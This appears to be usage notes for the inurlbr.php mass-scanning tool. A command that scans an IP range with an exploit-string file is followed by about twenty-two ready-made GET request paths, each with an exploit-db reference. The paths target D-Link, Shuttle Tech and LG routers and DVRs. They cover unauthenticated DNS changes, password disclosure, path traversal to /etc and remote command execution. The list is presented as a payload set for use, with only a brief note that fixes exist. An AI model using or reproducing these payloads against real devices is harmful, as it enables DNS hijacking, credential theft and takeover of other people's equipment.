php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200

print output:
COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200  print output:

Strings exploits used:

All exploits cited already have packages fix.

Exploit_model: Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/

Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/

Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/

Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/

Exploit_model: D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/

Exploit_model: D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/

Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/

Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/

Exploit_model: D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link AP 3200 - Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/

Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/

Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/

Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link DSL-2750B ADSL Router - CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/

Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/

Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/

Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/

Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/

Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/

Exploit_model: D-Link DIR-645 1.03B08 - Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/